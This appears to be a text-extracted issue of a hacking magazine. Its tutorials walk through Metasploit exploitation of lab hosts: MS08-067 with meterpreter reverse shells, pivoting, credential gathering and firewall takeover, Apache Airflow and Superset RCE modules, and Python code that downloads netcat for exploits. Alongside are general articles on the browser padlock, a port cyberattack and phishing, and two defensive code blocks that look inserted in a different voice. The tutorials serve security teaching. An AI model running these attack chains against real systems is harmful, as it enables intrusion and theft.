Edition 6 Issue 11
Learn how Black Hat Hackers hack.
7 tips from a cybersecurity expert to stay safe from phishing scams.
To advertise with us, contact: admin@hackercoolmagazine.com
Then you will know the truth and the truth will set you free.
John 8:32

Editor's Note
Edition 6 Issue 11
Hackercool Magazine wishes you a Merry Christmas and a
INSIDE
See what our Hackercool Magazine's November 2023 Issue has in store for you.
1. Black Hat Hacking Scenario: Part 2
2. Cyber Security: The vast majority of us have no idea what the padlock icon on our internet browser is - and it's putting us at risk.
3. Metasploit This Month: Latest Apache Modules
4. Cyber War: Major cyberattack on Australian port suggests sabotage by a 'foreign actor'.
5. Exploit Writing: Part 3 - Downloading files and payloads.
6. Online Security: Phishing scams: 7 safety tips from a cybersecurity expert.
Downloads
Other Useful Resources
(Diagram: Company's network firewall, attacker's network firewall, target network)
Let's see it practically. For this, I install another pfSense Firewall to act as the gateway for the attacker system. Here are the WAN and LAN networks of the target system's firewall.
Starting syslog... done.
Starting CRON... done.
pfSense 2.7.0-RELEASE amd64 Wed Jun 28 03:53:34 UTC 2023
Bootup complete
FreeBSD/amd64 (pfSense.home.arpa) (ttyv0)
VMware Virtual Machine - Netgate Device ID: 2cla85168blc5538fa80
Enter an option:
The target system's IP address is 192.168.223.6.
FreeBSD/amd64 (pfSense.home.arpa) (ttyv0)
VMware Virtual Machine - Netgate Device ID: 572b5d2f4031e3be0890
Enter an option:
The attacker system's IP address is 192.168.110.5.
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:93:da:f0 brd ff:ff:ff:ff:ff:ff
    inet 192.168.110.5/24 brd 192.168.110.255 scope global dynamic noprefixroute eth0
       valid_lft 7149sec preferred_lft 7149sec
    inet6 fe80::8aff:8c6:5ba:be98/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
(Diagram: Attacker system IP: 192.168.110.5; Target system IP address: 192.168.223.6)
So, I load the ms08_067 module and the target is indeed vulnerable. I set the other required options.
According to CrowdStrike's Global Threat Report 2023, Black Hat Hackers used protocols such as RDP, SSH and SMB for lateral movement in cloud environments.
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.249.160
rhosts => 192.168.249.160
msf6 exploit(windows/smb/ms08_067_netapi) > check
[+] 192.168.249.160:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > set lport 81
lport => 81
msf6 exploit(windows/smb/ms08_067_netapi) >
After all the options are set, I execute the module and the result is given below.
msf6 exploit(windows/smb/ms08_067_netapi) > run
(pfSense screenshot: Firewall / NAT / Port Forward / Edit - Edit Redirect Entry. Interface: WAN. Address Family: IPv4. Protocol: TCP/UDP. Destination port range: Other 81 to Other 81. Redirect target IP: Single host 192.168.110.5. Redirect target port: 81.)
meterpreter > sysinfo
Computer : ADMIN-FFBE8F88E
OS : Windows XP (5.1 Build 2600, Service Pack 2)
(Diagram: Internet; Attacker system IP: 192.168.110.5; Target system IP address: 192.168.223.6)
Lateral Movement

In the real world, Black Hat Hackers hack to get access to high-value assets. These can include sensitive data, source code and other important information. Rarely does the system to which Black Hat Hackers gain initial access contain the high-value assets mentioned above. So, after gaining initial access in a network, Black Hat Hackers try to move around the network in search of high-value assets and finally take control of the entire network. This is known as Lateral Movement or Pivoting. They use various techniques to achieve this. The first step in Lateral Movement is of course to perform reconnaissance to gather information about the network devices. To gather information about the target network, Black Hat Hackers perform steps like viewing the Address Resolution Protocol (ARP) table, viewing network interfaces, network connections and the target network's routing table.
Let's see it practically. On the target network, I have SYSTEM level METERPRETER access on one of the systems (I am talking about our target system, buddy). Meterpreter has many commands built in to perform the above-mentioned reconnaissance.
Let's first view the Address Resolution Protocol (ARP) table of the target system.
meterpreter > arp
ARP cache
meterpreter >
Let's see if the target system belongs to a dual-homed network or a single-homed network. A computer in a dual-homed network is connected to two networks. For example, the pfSense Firewall we are using here (WAN & LAN). The 'ipconfig' command in Windows reveals the network interfaces the system is connected to.
meterpreter > ipconfig
Interface 1
Interface 2
meterpreter >
The target system belongs to a single-homed network. No luck here. Next, let's view the routing table on the target system. In the above image, you can see that there is only one IP address which
meterpreter > route
IPv4 network routes
Matching Modules
Module options (post/multi/manage/autoroute):
msf6 post(multi/manage/autoroute) >
What I have to do to execute this module is set the session ID of the Meterpreter session.
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
The route is added. Now, we can perform a port scan of this device. Here I am scanning for some common ports to be open on this device.
msf6 post(multi/manage/autoroute) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set ports 80,21,23,25
ports => 80,21,23,25
msf6 auxiliary(scanner/portscan/tcp) > run
Active sessions
11/16/2023 01:21 PM <DIR> .
11/16/2023 01:21 PM <DIR> ..
11/16/2023 11:48 AM <DIR> Common Files
11/16/2023 11:43 AM <DIR> ComPlus Applications
11/16/2023 11:45 AM <DIR> Internet Explorer
11/16/2023 11:43 AM <DIR> Messenger
11/16/2023 11:45 AM <DIR> microsoft frontpage
11/16/2023 11:44 AM <DIR> Movie Maker
11/16/2023 11:43 AM <DIR> MSN
11/16/2023 11:43 AM <DIR> MSN Gaming Zone
11/16/2023 11:44 AM <DIR> NetMeeting
11/16/2023 11:44 AM <DIR> Online Services
12/04/2023 02:58 PM <DIR> Opera
11/16/2023 11:44 AM <DIR> Outlook Express
11/16/2023 11:48 AM <DIR> VMware
11/16/2023 11:45 AM <DIR> Windows Media Player
11/16/2023 11:43 AM <DIR> Windows NT
11/16/2023 11:45 AM <DIR> xerox
0 File(s) 0 bytes
18 Dir(s) 18,827,309,056 bytes free
Matching Modules
normal No IE credential gatherer
Module options (post/windows/gather/credentials/ie):
View the full module info with the info, or info -d command.
msf6 post(windows/gather/credentials/ie) >
msf6 post(windows/gather/credentials/ie) > run
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
[*] Index.dat downloaded
[+] File saved to: /home/kali/.msf4/loot/20231204043905_default_192.168.223.6_IEindex.dat_960486.dat
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012023111620231117\index.dat
[*] Index.dat downloaded
[+] File saved to: /home/kali/.msf4/loot/20231204043906_default_192.168.223.6_IEindex.dat_863745.dat
Matching Modules
# Name Disclosure Date Rank Check Description
Module options (auxiliary/server/socks_proxy):
Auxiliary action:
(Firefox screenshot: Settings > Network Settings > Connection Settings > Configure Proxy Access to the Internet. "Manual proxy configuration" is selected, with the SOCKS v4 / SOCKS v5 option and the "Also use this proxy for HTTPS" checkbox; the other choices are "No proxy", "Auto-detect proxy settings for this network" and "Automatic proxy configuration URL".)
(Browser screenshot: pfSense login page. SIGN IN. Username: admin.)
(pfSense dashboard screenshot after login: Status / System. System: VMware Virtual Machine, Netgate Device ID, BIOS Vendor Phoenix Technologies LTD, Version 2.7.0-RELEASE (amd64) built on Wed Jun 28 2023, FreeBSD 14.0-CURRENT, CPU Type Intel Core i7-2600 CPU 3.40GHz, AES-NI CPU Crypto: Yes (inactive), QAT Crypto: No. Netgate and pfSense community support resources panel.)
Voila, login successful. We now owned the Firewall too.
(Diagram: Internet; Attacker system IP: 192.168.110.5; Target system IP address: 192.168.223.6)
We have successfully performed Lateral Movement too. Now, we can set any rules we want and do whatever we want. But for now, let's just view the rule that exposed Windows XP to the internet.
(pfSense screenshot: Firewall / NAT / Port Forward, showing the linked rule.)
The vast majority of us have no idea what the padlock icon on our internet browser is - and it's putting us at risk
CYBERSECURITY
Fiona Carroll, Reader in Human Computer Interaction, Cardiff Metropolitan University

Do you know what the padlock symbol in your internet browser's address bar means? If not, you're not alone. New research by my colleagues and I shows that only 5% of UK adults understand the padlock's significance. This is a threat to our online safety.

The padlock symbol on a web browser simply means that the data being sent between the web server and the user's computer is encrypted and cannot be read by others. But when we asked people what they thought it meant, we received an array of incorrect answers.

In our study, we asked a cross section of 528 web users, aged between 18 and 86 years of age, a number of questions about the internet. Some had a bachelor's degree or above and 22% had a college certificate, while the remainder had no further education.

One of our questions was: "On the Google Chrome browser bar, do you know what the padlock icon represents/means?" Of the 463 who responded, 63% stated they knew, or thought they knew, what the padlock symbol on their web browser meant, but only 7% gave the correct meaning. Respondents gave us a range of incorrect interpretations, believing among other things that the padlock signified a secure web page or that the website is safe and doesn't contain any viruses or suspicious links. Others believed the symbol means a website is "trustworthy", is not harmful, or is a "genuine" website.
(Cont'd on next page)
Not understanding symbols like the padlock icon can pose problems to internet users. These include increased security risks and simply hindering effective use of the technology.

Our findings corroborate research by Google itself, who in September replaced the padlock icon with a neutral symbol described as a "tune icon". In doing so, Google hopes to eradicate the misunderstandings that the padlock icon has afforded. However, Google's update now raises the question as to whether other web browser companies will join forces to ensure their designs are uniform and intuitive across all platforms.

Web browser evolution

Without a doubt, the browser, which is our point of entry to the world wide web, comes with a lot of responsibility on the part of web companies. It's how we now view web pages, so the browser has become an integral part of our daily lives.

It's intriguing to look back and trace the evolution of the web's design from the early 1990s to where we are today. Creating software that people wanted to use and found effective was at the heart of this evolution. The creation of functioning, satisfying, and most importantly, consistently designed user interfaces was an important goal in the 1990s. In fact, there was a drive in those early days to create web interface designs that were so consistent and intuitive that users would not need to think too much about how they work.

Nowadays, it's a different story because the challenge is centred on helping people to think before they interact online. In light of this, it seems bizarre that the design of the web browser in 2023 still affords uncertainty through its design. Worse still, that it is inconsistently presented across its different providers.

It could be argued that this stems from the browser wars of the mid-1990s. That's when the likes of Microsoft and former software company, Netscape, tried to outdo each other with faster, better and more unique products. The race to be distinct meant there was inconsistency between products.

Internet Safety

However, introducing distinct browser designs can lead to user confusion, misunderstanding and a false sense of security, especially when it is now widely known that such inconsistency can breed confusion, and from that, frustration and lack of use.

"As an expert in human-computer interaction, it is alarming to me that web browser companies continue to disregard established guidelines for usability."

As an expert in human-computer interaction, it is alarming to me that some browser companies continue to disregard established guidelines for usability. In a world where web browsers open the doors to potentially greater societal risks than the offline world, it is crucial to establish a consistent approach for addressing these dangers.

As a minimum, we need web browser companies to join forces in a concerted effort to shield users, or at the very least, heighten their awareness regarding potential online risks. This should include formulating one unified design across the board that affords an enriched and safe user experience.

This article first appeared in The Conversation.
Starting from January 1, 2024, Hackercool Magazine will be leaving YouTube, as most of the videos we are posting are becoming victims of "content violation" (obviously). We are finding it difficult to maintain the standard of videos and adhere to YouTube's content policies. Hackercool Magazine will also be leaving Pinterest starting from the same date mentioned above. If you are following us on any of the above social media channels, we request you to shift to our other social media channels.
Latest Apache Modules

Apache Airflow is an open-source tool that is used for orchestration of data pipelines or workflows. Workflows and data pipelines are useful in creating visualizations of sales numbers of the previous day, for example. It is used by Adobe, Adyen, Snap etc.

The above-mentioned versions of Apache Airflow software have an unauthenticated command injection vulnerability. This vulnerability is a result of two critical vulnerabilities. The first one is CVE-2020-11978, which is an authenticated command injection vulnerability in the "example_trigger_target_dag".

The second one is CVE-2020-13927, and this is the default setting of Airflow 1.10.10 that allows unauthenticated access to the Airflow Experimental REST API. This REST API allows anyone to perform malicious actions like creating the vulnerable DAG above.

Combining these two vulnerabilities, attackers can perform remote code execution. Let's see how this module works. We have tested this on Apache Airflow 1.10.10 running as a docker container. The compose file for this can be downloaded from the link given in our Downloads section. Let's set the target first. Start the container.
┌──(kali㉿212d)-[~/airflow]
└─$ docker-compose up
Creating network "airflow_default" with the default driver
Pulling x-airflow-common (apache/airflow:1.10.10)...
1.10.10: Pulling from apache/airflow
c499e6d256d6: Downloading [=================================================>] 27.09MB/27.09MB
fcd8fd2c1414: Download complete
a84950f39508: Download complete
40d9fd69f299: Waiting
575a90dc4418: Waiting
b2d0414a4eae: Waiting
4337a8e826e8: Waiting
e34710f157f2: Waiting
a1cca2542086: Waiting
The target is ready. Now, load the Apache_Airflow_RCE module.

"The importance of epistemic security and cybersecurity is now comparable to that of national security" - Roger Spitz
msf6 > search airflow
Matching Modules
Module options (exploit/linux/http/apache_airflow_dag_rce):
Exploit target:
Id Name
-- ----
0 Unix Command
Set all the required options and see if the target is indeed vulnerable.
msf6 exploit(linux/http/apache_airflow_dag_rce) > set rhosts 192.168.16.2
rhosts => 192.168.16.2
msf6 exploit(linux/http/apache_airflow_dag_rce) > check
[*] 192.168.16.2:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/apache_airflow_dag_rce) >
The target is indeed vulnerable. After setting all the options, execute the module.
msf6 exploit(linux/http/apache_airflow_dag_rce) > set lhost 192.168.16.1
lhost => 192.168.16.1
msf6 exploit(linux/http/apache_airflow_dag_rce) > run
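The module only works when both conditions described above hold at once: the experimental API accepts unauthenticated calls and the example DAGs are loaded. As an added example (not the magazine's or the Metasploit module's code), here is a Python audit of the two airflow.cfg settings that control those conditions, run over constructed weak and hardened configs; the key names [api] auth_backend and [core] load_examples are real Airflow settings, the sample files are constructed:

```python
import configparser

# Constructed sample of the relevant airflow.cfg settings as Airflow 1.10.10 ships
# them by default (not a file from the magazine): the experimental API answers to
# anyone, and the example DAGs (including example_trigger_target_dag) are loaded.
WEAK_CFG = """
[core]
load_examples = True

[api]
auth_backend = airflow.api.auth.backend.default
"""

# The same two settings hardened: deny_all refuses every unauthenticated API call
# (the default from 1.10.11 onwards) and the example DAGs are not loaded at all.
HARDENED_CFG = """
[core]
load_examples = False

[api]
auth_backend = airflow.api.auth.backend.deny_all
"""

OPEN_BACKEND = "airflow.api.auth.backend.default"


def audit_airflow_cfg(cfg_text):
    """Return findings for the two settings that together make the RCE chain work:
    an open experimental API (CVE-2020-13927) and the loaded, command-injectable
    example DAG (CVE-2020-11978). Missing keys are treated as the 1.10.10 defaults."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(cfg_text)
    findings = []
    backend = parser.get("api", "auth_backend", fallback=OPEN_BACKEND)
    if backend == OPEN_BACKEND:
        findings.append("[api] auth_backend = default: experimental REST API is "
                        "reachable without authentication (CVE-2020-13927)")
    if parser.getboolean("core", "load_examples", fallback=True):
        findings.append("[core] load_examples = True: example_trigger_target_dag "
                        "is deployed and command-injectable (CVE-2020-11978)")
    return findings


def chain_exploitable(cfg_text):
    """True only when both findings are present, i.e. the unauthenticated RCE chain
    the module relies on is available against this configuration."""
    return len(audit_airflow_cfg(cfg_text)) == 2


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CFG), ("hardened", HARDENED_CFG)):
        print(name, "- chain exploitable:", chain_exploitable(text))
        for finding in audit_airflow_cfg(text):
            print("   ", finding)
```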
Once the docker image is created, create a user named "admin".
(Terminal screenshot: WARNING banner printed by the container.)
The target is ready. Load the auxiliary/gather/apache_superset_cookie_sig_priv_esc module and set the required options.
msf6 > search superset
Matching Modules
# Name Disclosure Date Rank Check Description
"Security used to be an inconvenience sometimes, but now it's a necessity all the time."
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > set rhosts 172.17.0.2
rhosts => 172.17.0.2
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > check
[-] Msf::OptionValidateError The following options failed to validate: USERNAME, PASSWORD
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > set username admin
username => admin
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > set password admi
password => admi
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > set password admin
password => admin
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > check
[*] 172.17.0.2:8088 - The target appears to be vulnerable. Apache Superset 2.0.0 is vulnerable
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) >
After all the options are set, execute the module.
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > run
[*] Running module against 172.17.0.2
Matching Modules
# Name Disclosure Date Rank Check Description
Interact with a module by name or index. For example info 1, use 1 or use exploit/linux/http/apache_superset_cookie_sig_rce
msf6 > use 1
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > show options
Module options (exploit/linux/http/apache_superset_cookie_sig_rce):
"You know something is wrong when the government declares opening someone else's mail is a felony but your internet activity is fair game for data collecting" - E.A. Bucchianeri
Payload options (python/meterpreter/reverse_tcp):
Exploit target:
Id Name
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set rhosts 172.17.0.2
rhosts => 172.17.0.2
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > check
[-] Msf::OptionValidateError The following options failed to validate: USERNAME, PASSWORD
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set username admin
username => admin
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set password admin
password => admin
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > check
[*] 172.17.0.2:8088 - The target appears to be vulnerable. Apache Superset 2.0.0 is vulnerable
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) >
Username Password
admin $pbkdf2-sha256$2600OO$NEVnY2l4WEEyblpVVWdqWQ$ja72QcI0TMPHtCeVmIHzIGOTgByllpWhIRqwpCyQuTk
meterpreter >
meterpreter > syyysinfo
[-] Unknown command: syyysinfo
meterpreter > sysinfo
Computer : 45f5ce6fda7f
OS : Linux 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12)
Architecture : x64
System Language : C
Meterpreter : python/linux
meterpreter > getuid
Server username: superset
meterpreter >
As readers can see, we successfully got a meterpreter session on the target system.
Major cyberattack on Australian ports suggests sabotage by a 'foreign state actor'
CYBER WAR
David Tuffley, Senior Lecturer in Applied Ethics & Cyber Security, Griffith University

A serious cyberattack has disrupted operations at several of Australia's largest ports, causing delays and congestion. Late on Friday, port operator DP World detected an IT breach that affected critical systems used to coordinate shipping activity.

DP World is one of Australia's largest port operators, handling approximately 40% of the nation's container trade across terminals in Brisbane, Sydney, Melbourne and Fremantle.

DP World reacted quickly to contain the breach, including shutting down access to their port networks on land, to prevent further unauthorised access. This means they essentially "pulled the plug" on their internet connection to limit possible further harm.

DP World senior director Blake Tierney said it is still possible to unload containers from ships, but the trucks that transport the containers can not drive in or out of the terminals. This is a precaution when the full extent of a data breach is not known.

The latest media reports suggest cargo could be stranded at the ports for several days. Australian Federal Police and the Australian Cyber Security Centre are investigating the source and nature of the attack, deemed a "nationally significant incident" by federal cybersecurity coordinator Darren Goldie.

Is there evidence of this being a malicious attack?

The timing, scale and impact of the disruption do suggest this was a targeted attack. It occurred on a Friday night, when most staff were off duty and less likely to notice or respond to the incident. The target was a major port operator that handles a significant share of Australia's trade and commerce. Such an attack can have serious consequences for Australia's economy, security and sovereignty.

The identity and motive of the attackers are not yet known, but the skills needed to mount such an attack suggest a foreign state actor trying to undermine Australia's national security or economic interests.

In recent years, cyberattacks on ports and shipping have become more common. For instance, in February 2022, several European ports were hit by a cyberattack that disrupted oil terminals. In another incident early this year, a ransomware attack on maritime software impacted more than 1,000 ships. Also in January 2023, the Port of Lisbon was targeted by a ransomware attack which threatened the release of port data. These incidents highlight the vulnerability of the maritime industry to cyber threats and the need for increased cybersecurity measures.

How might the attack have happened?

So far, the details have not been disclosed. But based on what we know about similar cases, it is possible the attack took advantage of vulnerabilities in DP World's systems. These vulnerabilities are normally closed by applying a "patch" in the same way your browser needs updating every week or two to keep it safe from being hacked.

Once hackers gained access, the breach likely pivoted to infiltrate the operational systems that directly manage port activities. Failing to isolate and secure these control networks allowed the incident to impact operations.

It is also possible access was gained via a phishing email or a malicious link. Such an attack may have tricked an employee or a contractor into opening an attachment or clicking on a link that installed malware or ransomware on the network.

Now what?

...and advice to DP World and other affected parties through the Critical Infrastructure Centre and the Trusted Information Sharing Network. These government agencies are equipped to provide timely support in times of crisis.

How can we prevent future attacks?

The DP World cyberattack is a clear warning of the risks to the essential transportation services that power Australia's trade and commerce.

"Ports are difficult targets. To cause such a disruption, the attackers would have to be highly skilled and plan ahead."

Ports are difficult targets. To cause such a disruption, the attackers would have to be highly skilled and plan ahead. The fact ports have been successfully hacked more than once in recent times suggests threats from cybercriminals are steadily increasing. For companies such as DP World, it's important to continuously monitor networks in real time, promptly install security patches and keep operational networks isolated from each other.

Dedicated, well-resourced cybersecurity personnel, employee training and incident response plans are key to improving preparedness. Ports should closely coordinate with government counterparts and industry partners on intelligence sharing and cybersecurity best practices. Cyber threats evolve so quickly that always being prepared for the latest one is a significant challenge.

For a seamless flow of goods, we need to be constantly vigilant of potential threats to our supply chain infrastructure. This latest attack is an urgent reminder that cyber resilience must be a top priority.
So, let's begin with the urllib module.

1. urllib module

We will continue from the same file 'first_exploit' that we left at the end of Part 2.
GNU nano 7.2  first_exploit
print(shutil.which("perl"))

Import the urllib module and edit the code as shown below.
GNU nano 7.2  first_exploit
import urllib
from urllib import request
URL = "https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip"
result = request.urlretrieve(URL, "netcat.exe")

┌──(kali㉿222vm)-[~/python_exploit]
└─$ ls
archive.zip  copied_exploit  copied_exploit_2  first_exploit  netcat.exe
┌──(kali㉿222vm)-[~/python_exploit]
└─$ file netcat.exe
netcat.exe: Zip archive data, at least v2.0 to extract, compression method=deflate

It is stored as netcat.exe as I have specified that name for it. Note that it still is a zip archive. You can also import the request function as shown below.
GNU nano 7.2  first_exploit
URL="

2) wget module

You all know wget, right? Yes. I am talking about the popular binary that is used to download fil-

GNU nano 7.2
import requests
URL = "https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip"
result = requests.get(URL)
open("netcat3.exe", "wb").write(result.content)

In our next issue, we will be combining all the python modules learnt in Part 1, Part 2 and Part 3 and explain to you how they will be useful in an exploit.
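The file was saved as netcat.exe but the 'file' command shows it is still a zip archive: the name you pass to urlretrieve says nothing about what was fetched. As an added example (not the magazine's code), here is a Python helper that downloads with urllib.request.urlretrieve as in the article and then identifies the saved file from its magic bytes, using a constructed local zip served over a file:// URL so it runs offline; the demo_mismatch function and the local archive are my additions:

```python
import os
import tempfile
import zipfile
from pathlib import Path
from urllib import request

# Magic bytes of the two file kinds that matter here: a zip archive (what the
# urlretrieve call in the article actually fetched) and a Windows PE executable
# (what the chosen file name netcat.exe suggests). Order matters: longest first.
MAGIC = (
    (b"PK\x03\x04", "zip archive"),
    (b"MZ", "Windows executable (PE)"),
)


def identify_bytes(head):
    """Classify a file from its leading bytes, the same way 'file' does."""
    for magic, kind in MAGIC:
        if head.startswith(magic):
            return kind
    return "unknown"


def identify(path):
    """Classify the file at path by reading only its first four bytes."""
    with open(path, "rb") as fh:
        return identify_bytes(fh.read(4))


def fetch(url, dest):
    """Download url to dest with urllib.request.urlretrieve (as in the article) and
    return what the saved file really is, regardless of the name we gave it."""
    request.urlretrieve(url, dest)
    return identify(dest)


def demo_mismatch():
    """Offline stand-in for the article's download (constructed sample): build a
    small zip, fetch it under an .exe name, and report what it actually is."""
    tmp = tempfile.mkdtemp()
    archive = os.path.join(tmp, "netcat.zip")
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr("readme.txt", "constructed sample, not the real netcat download")
    # A file:// URL goes through urlretrieve exactly like an https:// one does.
    return fetch(Path(archive).as_uri(), os.path.join(tmp, "netcat.exe"))


if __name__ == "__main__":
    print(demo_mismatch())  # zip archive, even though the file is named netcat.exe
```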
Phishing scams: 7 safety tips from a cybersecurity expert
ONLINE SECURITY
Thembekile Olivia Mayayise, Senior Lecturer, University of the Witwatersrand

Recently, one of my acquaintances, Frank, received an email late on a Monday afternoon with the subject line, "Are you still in the office?" It appeared to come from his manager, who claimed to be stuck in a long meeting without the means to urgently purchase online gift vouchers for clients. He asked for help and shared a link to an online platform, from which Frank bought R6,000 (about US$325) worth of gift vouchers. Once he'd sent the codes he received a second email from the "boss" requesting one more voucher.

At that point, Frank reached out to his boss through WhatsApp and discovered he'd been duped. Frank had fallen prey to a phishing scam.

This is just one example of many from my own circles. Other friends and relatives - some of them seasoned internet users who know about the importance of cybersecurity - have also fallen prey to phishing scams.
(Cont'd on next page)

I am a cybersecurity professional who conducts research on and teaches various cybersecurity topics. In recent years I have noticed (and confirmed through research) that some organisations and individuals seem fatigued by cybersecurity awareness efforts. Is it possible that they assume most people are technologically astute and constantly well-informed? Or could it simply be that fatigue has set in because of the demanding nature of cybersecurity awareness campaigns? Though I have no definitive answer, I suspect the latter.

The reality is that phishing scams are here to stay and the methods employed in their execution continue to evolve. Given my expertise and experience, I would like to offer seven tips to help you stay safe from phishing scams. This is especially important during the festive season as people shop for gifts and book holidays online. These activities create more opportunities for cybercriminals to net new victims. However, these tips are appropriate throughout the year. Cybercriminals don't take breaks - so you shouldn't ever drop your guard.

What is phishing?

"Phishing" is a strategy designed to deceive people into revealing sensitive information such as credit card details, login credentials and, in some instances, identification numbers.

The most common form of phishing is via email. Phishers send fraudulent emails that appear to be from legitimate sources. The messages often contain links to fake websites designed to steal login credentials or other sensitive information. The same email will be sent to many addresses. Phishers can obtain emails from places such as corporate websites, existing data breaches, social media platforms, business cards or other publicly available company documents. Cybercriminals know that casting their net wide means they'll surely catch some.

Voice phishing (vishing) is another form of this scam. Here, perpetrators use voice communication, like a phone call in which the caller falsely claims to be a bank official and seeks to assist you in resetting your password or updating your account details. Other common vishing scams centre on offering discounts or rewards if you join a vacation club, provided you disclose your personal credit card information.

Social media phishing, meanwhile, happens when scammers create fake accounts purporting to be real people (for instance, posing as Frank's boss). They then start interacting with the real person's connections to deceive them into giving up sensitive information or performing financial favours.

Who is behind these scams?

Typically, these are seasoned and cunning scammers who have honed their skills in the world of phishing over an extended period. Some work alone; others belong to syndicates.

Phishing skills

Successful phishers have a variety of skills. They combine psychological tactics and technical prowess.

They are master manipulators, playing on victims' emotions. Individuals are deceived into believing they've secured a substantial sum, often millions, through a jackpot win. This scheme falsely claims that their cellphone number or email was used for entry. Consequently, the victim doesn't seek clarification. Excited about getting the windfall payment quickly, they give their personal information to cybercriminals.

These scammers even tailor their approach to match individuals' personal beliefs. For example, if you have an affinity for ancestral worship, be prepared for a message from someone claiming to be a medium, asserting that your great-great-grandfather is requesting a money ritual involving a deposit to a particular account and promising multiplication of your funds - even though your ancestors have communicated no such information.

Likewise, if you are a devout Christian, someone claiming to be "Prophet Profit" might attempt to contact you through a messaging platform, su-
(Cont'd on next page)